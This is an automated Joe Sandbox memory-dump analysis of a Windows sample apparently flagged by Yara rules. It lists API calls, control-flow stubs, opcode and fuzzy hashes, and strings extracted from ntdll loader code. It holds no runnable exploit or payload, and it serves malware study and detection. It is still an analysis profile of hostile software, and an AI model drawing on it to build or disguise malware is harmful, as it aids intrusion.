                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                      • Instruction ID: 909fc2b4ca3a4550b39ab19aeeb864a5ab6787f159b2023eaaf7fb7357fa332a
                                                      • Opcode Fuzzy Hash: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                      • Instruction Fuzzy Hash: B390023224148803D1147158950474A500597D1301F59C421A4425658DC79589917221
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                      • Instruction ID: caf486c23f7d10561983d9f01938330bd44fdbd48d637f37d166cc29bba03e3c
                                                      • Opcode Fuzzy Hash: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                      • Instruction Fuzzy Hash: 7F90023224140403D10475986508646500597E1301F55D021A5025555EC76589916231
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                                      • Instruction ID: 8962f7a60ce07900451f513ede7e8aee07e69f896d8f36c8150418bfca071ff4
                                                      • Opcode Fuzzy Hash: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                                      • Instruction Fuzzy Hash: 9B90026238140443D10471585514B065005D7E2301F55C025E1065554DC719CD526226
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                                      • Instruction ID: 13f29a008d4aff3de88beb20a29d6af7b8ac2b1267209e1b279975a7cb71e307
                                                      • Opcode Fuzzy Hash: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                                      • Instruction Fuzzy Hash: 7390023224180403D1047158591470B500597D1302F55C021A1165555DC72589516671
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                                      • Instruction ID: c7573c559733c18d0b9ef95b84433b5540a2029404fa9d9445845791482fefe0
                                                      • Opcode Fuzzy Hash: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                                      • Instruction Fuzzy Hash: 42900222641400434144716899449069005BBE2211755C131A0999550DC75989655765
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                                      • Instruction ID: 1bcd6215ed89a47f4a9c973ee97d44075cf9abe8a4ec83358738595c0cacdc06
                                                      • Opcode Fuzzy Hash: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                                      • Instruction Fuzzy Hash: 3E900222251C0043D20475685D14B07500597D1303F55C125A0155554CCB1589615621
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                                      • Instruction ID: 6f7163a2a037d34a09574f2cdab892ab8aa50b620f195be909f9db5538d1929b
                                                      • Opcode Fuzzy Hash: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                                      • Instruction Fuzzy Hash: 8B90022264140503D10571585504616500A97D1241F95C032A1025555ECB258A92A231
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                                      • Instruction ID: a2984a9d76550ab227d15d05a84e0b9cb3e1b4e89a737c2cafba31b589a276dc
                                                      • Opcode Fuzzy Hash: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                                      • Instruction Fuzzy Hash: A290047334140403D144715C55047475005D7D1301F55C031F5075554FC75DCFD57775
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f6ba40f36a446a34926a16e13db83a472e6b0eb4014504b183b686ffc875886
                                                      • Instruction ID: aa195f0a0af1fd99cd61e52985a94cc4508177482d9610c79777d473fbad4be0
                                                      • Opcode Fuzzy Hash: 9f6ba40f36a446a34926a16e13db83a472e6b0eb4014504b183b686ffc875886
                                                      • Instruction Fuzzy Hash: D1213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

                                                      Control-flow Graph

                                                      control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A65D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: &EA
                                                      • API String ID: 1279760036-1330915590
                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

                                                      Control-flow Graph

                                                      control_flow_graph 204 408309-40835a call 41be60 call 41ca00 call 40ace0 call 414e40 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a470 213->215 216 40838d 213->216 215->216 216->214
                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: a9deb499662bcce9bf8bc78a4bb1f1fefe3221ce0d8095465ec87d1be3085402
                                                      • Instruction ID: f3953570c60373893bf72e46575f7e09a002cef20f5442a3f0aca23ab0b73e4b
                                                      • Opcode Fuzzy Hash: a9deb499662bcce9bf8bc78a4bb1f1fefe3221ce0d8095465ec87d1be3085402
                                                      • Instruction Fuzzy Hash: 4C01F531A80368B7E721A6959C43FEE7B2C9B40F84F05015DFF44BA1C2E6E9690542EA

                                                      Control-flow Graph

                                                      control_flow_graph 219 408310-40831f 220 408328-40835a call 41ca00 call 40ace0 call 414e40 219->220 221 408323 call 41be60 219->221 228 40835c-40836e PostThreadMessageW 220->228 229 40838e-408392 220->229 221->220 230 408370-40838a call 40a470 228->230 231 40838d 228->231 230->231 231->229
                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 2fef15b3573e963dab4dee3ae98b595d245d4acc25ee333acbb79ae82eec217e
                                                      • Instruction ID: 918bfee87343fa17fe5f753d684441ffefb87cf5ca75bfa6275ae09e86d24780
                                                      • Opcode Fuzzy Hash: 2fef15b3573e963dab4dee3ae98b595d245d4acc25ee333acbb79ae82eec217e
                                                      • Instruction Fuzzy Hash: 99018471A8032C77E721A6959C43FFE776C6B40B94F05012AFF04BA1C1E6E8690546EA

                                                      Control-flow Graph

                                                      control_flow_graph 255 41a662-41a687 call 41af60 257 41a68c-41a6a1 RtlFreeHeap 255->257
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A69D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c43988574fa1a0ba8ae0e4f679689f6ce62e6a11d8302781c80a156eac68f0c0
                                                      • Instruction ID: 54ae2cbc6702ca787e244acd037496ed0edeec7915d4c27fd7eefbb9cddf7d1e
                                                      • Opcode Fuzzy Hash: c43988574fa1a0ba8ae0e4f679689f6ce62e6a11d8302781c80a156eac68f0c0
                                                      • Instruction Fuzzy Hash: 0EE06DB12046096BD718DF59DC44EE73769EF89360F108249F9599B681C630E811CAB0

                                                      Control-flow Graph

                                                      control_flow_graph 258 41a670-41a686 259 41a68c-41a6a1 RtlFreeHeap 258->259 260 41a687 call 41af60 258->260 260->259
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A69D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0

                                                      Control-flow Graph

                                                      control_flow_graph 261 41a7d0-41a804 call 41af60 LookupPrivilegeValueW
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A800
Memory Dump Source
• Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
Memory Dump Source
• Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
Memory Dump Source
• Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
Strings
• Critical section address, xrefs: 01135425, 011354BC, 01135534
• corrupted critical section, xrefs: 011354C2
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354CE
• undeleted critical section in freed memory, xrefs: 0113542B
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0113540A, 01135496, 01135519
• Thread is in a state in which it cannot own a critical section, xrefs: 01135543
• Critical section debug info address, xrefs: 0113541F, 0113552E
• Critical section address., xrefs: 01135502
• double initialized or corrupted critical section, xrefs: 01135508
• Invalid debug info address of this critical section, xrefs: 011354B6
• Address of the debug info found in the active list., xrefs: 011354AE, 011354FA
• 8, xrefs: 011352E3
• Thread identifier, xrefs: 0113553A
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354E2
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
Strings
• @, xrefs: 0113259B
• SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01132602
• SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01132498
• RtlpResolveAssemblyStorageMapEntry, xrefs: 0113261F
• SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011322E4
• SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01132409
• SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011325EB
• SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01132506
• SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01132412
• SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01132624
• SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011324C0
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID:
• String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
• API String ID: 0-4009184096
Strings
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID:
• String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
• API String ID: 0-2515994595
Strings
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID:
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 0-1700792311
Strings
• AVRF: -*- final list of providers -*- , xrefs: 01148B8F
• AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01148A67
• VerifierDebug, xrefs: 01148CA5
• AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01148A3D
• VerifierFlags, xrefs: 01148C50
• VerifierDlls, xrefs: 01148CBD
• HandleTraces, xrefs: 01148C8F
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID:
• String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
• API String ID: 0-3223716464
Strings
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID:
• String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
• API String ID: 0-1109411897
Strings
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID:
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• API String ID: 0-792281065
Strings
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011199ED
• apphelp.dll, xrefs: 010B6496
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 01119A01
• LdrpInitShimEngine, xrefs: 011199F4, 01119A07, 01119A30
• minkernel\ntdll\ldrinit.c, xrefs: 01119A11, 01119A3A
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01119A2A
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID:
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-204845295
Strings
• SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01132178
• SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0113219F
• SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01132180
• RtlGetAssemblyStorageRoot, xrefs: 01132160, 0113219A, 011321BA
• SXS: %s() passed the empty activation context, xrefs: 01132165
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011321BF
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID:
• String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
• API String ID: 0-861424205
Strings
• minkernel\ntdll\ldrredirect.c, xrefs: 01138181, 011381F5
• LdrpInitializeProcess, xrefs: 010FC6C4
• LdrpInitializeImportRedirection, xrefs: 01138177, 011381EB
• Loading import redirection DLL: '%wZ', xrefs: 01138170
• minkernel\ntdll\ldrinit.c, xrefs: 010FC6C3
• Unable to build import redirection Table, Status = 0x%x, xrefs: 011381E5
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID:
• String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
• API String ID: 0-475462383
APIs
  • Part of subcall function 01102DF0: LdrInitializeThunk.NTDLL ref: 01102DFA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BA3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BB6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D60
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D74
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
• String ID:
• API String ID: 1404860816-0
                                                      • Opcode ID: 82d2598ec8009ac33d971c497c3154241b21281ae9f23168c7c4a038c2518ce3
                                                      • Instruction ID: 851b17f4cb71c027e1d195b89e615a79eba8706e372ee2490eea5fb9035ca3b7
                                                      • Opcode Fuzzy Hash: 82d2598ec8009ac33d971c497c3154241b21281ae9f23168c7c4a038c2518ce3
                                                      • Instruction Fuzzy Hash: FA427071900715DFDB29CF28C840BAAB7F4FF48314F1445A9E989EB285E7B0A985CF61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      • API String ID: 0-379654539
                                                      • Opcode ID: 6e1cf58f85800d0dc3ae322e7aa4058e530d143a63de08ecc13f547e6cd4d025
                                                      • Instruction ID: 37d5dce524c0e2fba15246abd82e495db571a7721696b9ee90bbe3c3332ece33
                                                      • Opcode Fuzzy Hash: 6e1cf58f85800d0dc3ae322e7aa4058e530d143a63de08ecc13f547e6cd4d025
                                                      • Instruction Fuzzy Hash: 6CC1577460838ACBD715DF58C044B6EB7E4BB98B04F04896EF9D68B251E734CA49CF52
                                                      Strings
                                                      • LdrpInitializeProcess, xrefs: 010F8422
                                                      • @, xrefs: 010F8591
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 010F8421
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010F855E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1918872054
                                                      • Opcode ID: 7a8bbfc2e2fe51a0db39d35f2124850aabf2bb0f20e9d440b1b4de0ec1631643
                                                      • Instruction ID: 5dfabe56bfb77d231692168b9260ba66100c9d621794ed4900cd4113a8538ae2
                                                      • Opcode Fuzzy Hash: 7a8bbfc2e2fe51a0db39d35f2124850aabf2bb0f20e9d440b1b4de0ec1631643
